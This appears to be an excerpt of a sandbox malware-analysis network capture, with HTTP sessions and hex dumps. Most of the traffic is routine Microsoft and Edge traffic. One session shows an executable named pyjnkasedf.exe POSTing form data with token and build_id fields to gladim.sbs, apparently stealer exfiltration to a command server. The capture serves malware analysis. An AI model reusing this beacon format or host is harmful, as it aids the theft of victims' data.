                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                      Expires: Sat, 30 Nov 2024 21:37:43 GMT
                                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                      x-ms-route-info: C512_BL2
                                                                                                                                                                                                                                                      x-ms-request-id: 240ac909-3965-41f7-b4bf-0aa18b2bc904
                                                                                                                                                                                                                                                      PPServer: PPV: 30 H: BL02EPF00027917 V: 0
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:42 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Content-Length: 11410
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC11410INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      102192.168.2.104985113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:43 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                      x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213843Z-174f784596886s2bhC1EWR743w000000120g00000000bdcs
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      103192.168.2.1049841142.250.181.974432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:43 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      Content-Length: 138356
                                                                                                                                                                                                                                                      X-GUploader-UploadID: AFiumC5ae8k5XBMHoCOMjSL-8n2otSP3APD7MX6JKBDT5Ct-OVmbTuv4hJApU64zhY57Snxs99cqHDSu4w
                                                                                                                                                                                                                                                      X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 16:45:00 GMT
                                                                                                                                                                                                                                                      Expires: Sun, 30 Nov 2025 16:45:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                      Age: 17624
                                                                                                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                      ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC817INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                      Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c
                                                                                                                                                                                                                                                      Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc
                                                                                                                                                                                                                                                      Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00
                                                                                                                                                                                                                                                      Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5
                                                                                                                                                                                                                                                      Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51
                                                                                                                                                                                                                                                      Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13
                                                                                                                                                                                                                                                      Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7
                                                                                                                                                                                                                                                      Data Ascii: `cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73
                                                                                                                                                                                                                                                      Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC1390INData Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00
                                                                                                                                                                                                                                                      Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      104192.168.2.104986894.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC319OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EHDHIDAEHCFHJJJJECAA
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 68733
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------EHDHIDAEHCFHJJJJECAACont
